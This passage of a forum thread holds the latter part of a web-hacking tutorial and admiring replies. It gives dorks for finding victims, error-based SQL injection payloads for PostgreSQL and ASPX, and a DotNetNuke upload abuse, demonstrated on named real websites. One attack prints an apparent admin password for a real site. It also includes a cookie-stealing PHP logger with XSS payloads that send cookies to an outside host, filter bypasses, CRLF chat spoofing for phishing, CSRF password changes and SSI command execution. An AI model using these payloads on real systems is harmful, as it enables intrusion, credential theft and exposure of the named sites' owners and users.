    Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors.

    2) Finding vulnerable sites

    Use Google dorks:
    Download source  Code
    inurl:faq.php?id=
    inurl:event.php?id=
    inurl:index.php?id=




    3) Site vulnerability check

    Add ' at end of link:
    Download source  Code
    http://www.link.com/page.php?page=1'




    so if we get:
    Download source  Code
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near




    site is vulnerable.

    4) Finding database version

    Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused.
    Download source  Code
    http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--




    If function is loaded successfully you will get this on page:
    Download source  Code
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"




    from where we get database version:
    Download source  Code
    PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit




    5) Finding table name

    As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions.

    We will use offset to say which result from base we want to list.
    Our link:
    Download source  Code
    http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim&#8203;it+1+offset+0)+as+int)--




    on page we will get this error:
    Download source  Code
    Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"




    from this we have table pg_type.

    to get next table we gonna change offset to 1:
    Download source  Code
    http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim&#8203;it+1+offset+1)+as+int)--




    and we gonna get table like pg_attribute.

    6) Finding column name

    First you have to do is to convert table name into decimal.
    We will use:
    Download source  Code
    http://easycalculation.com/ascii-hex.php




    type string admin and you will get decimal code:
    Download source  Code
    97 100 109 105 110




    We will change this code a bit, so it should look like this:
    Download source  Code
    CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)




    Now we will put it for table names and get columns.
    Download source  Code
    http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+w&#8203;here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+&#8203;offset+0)+as+int)--




    and we will get column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table.

    7) Taking data from columns

    We found column username and password and now we want to get data from column.
    Download source  Code
    http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limi&#8203;t+1+offset+0)+as+int)--




    and we will get this:
    Download source  Code
    admin:21232f297a57a5a743894a0e4a801fc3




    CHR(58) presents two points (:) and we use to get two columns at same time.

    NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.

    [XI] SQL Injection on ASPX

    1) Site vulnerability check

    Vulnerable link:
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton




    We will add order by 1--:
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--




    If you get page error go to:
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535




    2) Finding column name

    Go to:
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1




    s13.postimage.org/6ivvov0iv/img2.jpg

    3) Finding table name
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))




    s7.postimage.org/qdv7qr5uz/img3.jpg

    We want admin table, so we type next:
    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))




    s15.postimage.org/sp0nmn9hn/img4.jpg

    admin table name is AdminMaster

    4) Finding columns in admin table

    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))




    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))




    Columns names:

    s14.postimage.org/pwr77oewh/img5.jpg

    s17.postimage.org/5i2zlmuu7/img6.jpg

    5) Finding username and password

    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))




    s15.postimage.org/hr7rnfeff/img7.jpg

    Download source  Code
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))




    s11.postimage.org/kvxwwklyr/img8.jpg

    Download source  Code
    Username: admin
    Password: pothys!@#




    [XII] Dot net nuke

    DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..

    Google dork to find vulnerable sites:
    Download source  Code
    inurl:fck/fcklinkgallery.aspx




    I'm going to use this site:
    Download source  Code
    http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx




    Now if page is loaded it will look like this:

    s18.postimage.org/erglobawp/image.jpg

    which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file.

    Download source  Code
    javascript:__doPostBack('ctlURL$cmdUpload','')




    Choose File and Text button Upload Selected File will show up.

    *on this site letter color matched with background so you will have to select whole page (CTRL+A) and you will see upload button.

    s17.postimage.org/6meo81nrz/image.jpg

    Upload file and access it by going to sitelink.com/portals/0/filename.extension
    ->
    Download source  Code
    http://kellyballancephotography.com/portals/0/config.txt




    [XIII] XSS

    1) XSS?

    XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
    You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.

    2) Required stuff

    Mozila FireFox:
    Download source  Code
    http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB




    Add-on Firebug:
    Download source  Code
    https://addons.mozilla.org/en-US/firefox/addon/firebug/




    Add-on FireCookie:
    Download source  Code
    https://addons.mozilla.org/en-US/firefox/addon/firecookie/




    Add-on Live HTTP Headers:
    Download source  Code
    https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi




    It is recommended to have primary knowledge of Javascripts.

    3) Testing XSS vulnerability

    Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something.
    e.g. of GET method:
    Download source  Code
    www.sitecom/index.php?page=<script>alert("XSS")</script>




    Command to check site vulnerability is:
    Download source  Code
    <script>alert("XSS")</script>




    Now I will explain what this command is doing:
    <script> - opening script tag
    alert("XSS") - window will pop-up saying "XSS"
    </script> - close script tag

    4) XSS types

    Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy.
    Cross-Site Request Forgery - we are sending some commands without knowing username.
    XSS Worms - it is "evil" script that have possibility to spread over whole site.
    Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc...
    Keylogging - you know what keylogging is.

    5) Cookie Stealing

    For cookie stealing we will need:
    -Vulnerable site
    -Web-host for scripts
    -php script

    attach this script on some hosting:

    cookie.php
    Download source  Code
    <?php                                                                                                             
    $cookie = $HTTP_GET_VARS["cookie"];                                                                     
    $file = fopen('cookielog.txt', 'a');                                                       
    fwrite($file, $cookie."\n");                                                                 
    ?>




    script executing:
    Download source  Code
    <script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
    ili
    <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
    ili
    <script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie;)</script>
    ili
    <script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>




    How this works?
    When some user log on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it:

    1) Open Mozilla
    2) Open Add-on Fire bug

    s9.postimage.org/r42pchyjz/aa2.jpg

    3) Type cookie name and value. Here is one:
    Download source  Code
    PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898



    from this cookie title is PHPSESSID
    from this cookie value is b3e4e100ab6bb912de1b80c4eed7898

    6) Filter bypassing

    1) Deleting script tag
    e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script>
    Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add <scr<script>ipt>alert("XSS")</scr</script>ipt>

    2) magic_quotes
    Explained here:
    Download source  Code
    http://en.wikipedia.org/wiki/Magic_quotes




    If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is magic_quotes protection.
    It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
    Here is example:
    This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
    Download source  Code
    <scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108&#8203;,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,11&#8203;1,107,105,101,61,)+document.cookie;</scr</script>ipt>




    This works when you add \ code ' or " and when you use integer you do not use ' or "

    and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool:
    Download source  Code
    Ascii to Decimal


    " target="_blank" title="autolink">http://pookey.co.uk/binary.php[/code]

    [XIV] CRLF

    1) CRLF?

    Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (\n).

    2) Vulnerable places

    Vulnerable places are anywhere. In this tut. I'm gonna use some chat.

    3) Exploiting vulnerability and protection

    Lets say if you send message chat will look like this:
    Download source  Code
    1.4.2012 10:29 - fodex: Why login page is down?
    1.4.2012 10:29 - saiR: Look like somebody deleted login database.
    1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
    1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back:

    " target="_blank" title="autolink">http://vulnerablesite.com/login.php[/code]

    If chat is vulnerable, it's gonna look like this:
    Download source  Code
    1.4.2012 10:30 - saiR: Ok go ahead...
    1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back:

    " target="_blank" title="autolink">http://vulnerablesite.com/login.php[/code]

    We wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins.


    4) Vulnerable script

    e.g.
    Download source  Code
    <?php
    if(isset($_POST['send_message']))
    {
       if(!empty($_POST['message']))
       {
          $message = htmlspecialchars($_POST['message']);
          // rest code to send msg
       }
    }
    ?>




    [XV] CSRF

    1) CSRF?

    Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username.

    2) Vulnerable places

    Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars.

    3) Exploiting vulnerability

    Lets say we have profile link:
    Download source  Code
    http://www.link.com/profile.php




    Where you can see user data (username, avatar, email...).
    Now when user want to edit his profile using e.g.
    Download source  Code
    http://www.link.com/edit_profile.php




    Now instead of avatar link we gonna add link from profile editing together with new code using GET method.

    NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.

    Add avatar link:
    Download source  Code
    http://www.link.com/edit_profile.php?password=newpassword




    password is name of input (It can be different, it's best to chekc source code)

    Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put.

    [XVI] Server Side Includes | Server Side Inclusion

    1) Introduction Server Side Includes

    Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml
    To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file.
    SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
    Download source  Code
    AddType text/html .shtml
    AddHandler server-parsed .shtml
    AddHandler server-parsed .html
    Options Indexes FollowSymLinks Includes




    2) SSI creating

    We are starting script with <!--#
    Some simple script look like this:
    <command> <variable>=<variable content>-->

    Download source  Code
    <command> -
    config
    include
    flow
    set
    printenv
    echo
    exec
    fsize
    flastmod
    time & date




    With --> we end script.

    script e.g.
    Download source  Code
    <!--#include file="yourfilename.txt" -->
    <!--#echo var='This will write this stupid text.'-->




    3) Server Side Inclusion

    Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.

    Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache config file.
    e.g. we can create file with next command:
    Download source  Code
    <!--#exec cmd='ls -la'-->




    Save this as .shtml file and open it on site.

    I think you already know what is going to happen.
    Hope this helped you!

    Thanks For Reading

    credits: EliteHackForums
     
    Offline
    02-12-2014 10:13 AM RE: HQ Guide - Web-Hacking Methods Tutorial | Edited by buglu 02-13-2014 03:22 AM
    Hey Hax,

    A very nice tutorial of different hacking methods!

    Also a very nice written guide on the most methods.

    But I want to point out that the nullbyte injection isnt really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


    But beside that, a very nice article Wink
     
    Offline
    02-12-2014 07:44 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    A very well put together tutorial. Thank you for sharing.
     
    Offline
    02-13-2014 05:25 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    buglu wrote:
    Hey Hax,

    A very nice tutorial of different hacking methods!

    Also a very nice written guide on the most methods.

    But I want to point out that the nullbyte injection isnt really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


    But beside that, a very nice article Wink


    yeah fine but nullbyte injection is still for a reference Smile

    Grin thanks
     
    Offline
    02-13-2014 05:26 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Override wrote:
    A very well put together tutorial. Thank you for sharing.


    yeah its my pleasure Smile i am just a SO Lov3r <3
     
    Offline
    02-13-2014 09:02 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    This is great mate. Thanks for your efforts,
     
    Offline
    02-16-2014 05:08 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Great guide hax366!
     
    Offline
    03-14-2014 11:14 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Nice tutorial bro thanks SmileCool
     
    Offline
    03-15-2014 05:22 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Awsome Grin
    JackerS
     
    Offline
    03-23-2014 04:56 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    would it be possible to get this in pdf file??
     
    Offline
    05-01-2014 02:11 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Mark! Thank you Very much! :P
     
    Offline
    05-01-2014 07:50 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    can you put this into pdf?


    bye N
     
    Offline
    05-11-2014 05:21 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    That must be the most detailed tut i've ever seen !
    thnx
     
    Offline
    05-11-2014 09:09 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Wonder how long it took u to do this mate! THANKS
     
    Offline
    06-30-2014 09:15 PM RE: HQ Guide - Web-Hacking Methods Tutorial | Edited by fishassassin 07-02-2014 11:54 PM
    Hey guys... Assuming it's okay with hax366, I'm in the process of converting his post into a PDF. It'll take some time, because formatting a file that large is really boring, but I should have it done in a day or two.

    EDIT: I've formatted the post into a .PDF to the best of my abilities, and uploaded it into the Security Override File Database under the 'articles' section. It is titled "hax366 webhacking tut.pdf"
     
    Offline
    Jump to Forum:
    Forum powered by fusionBoard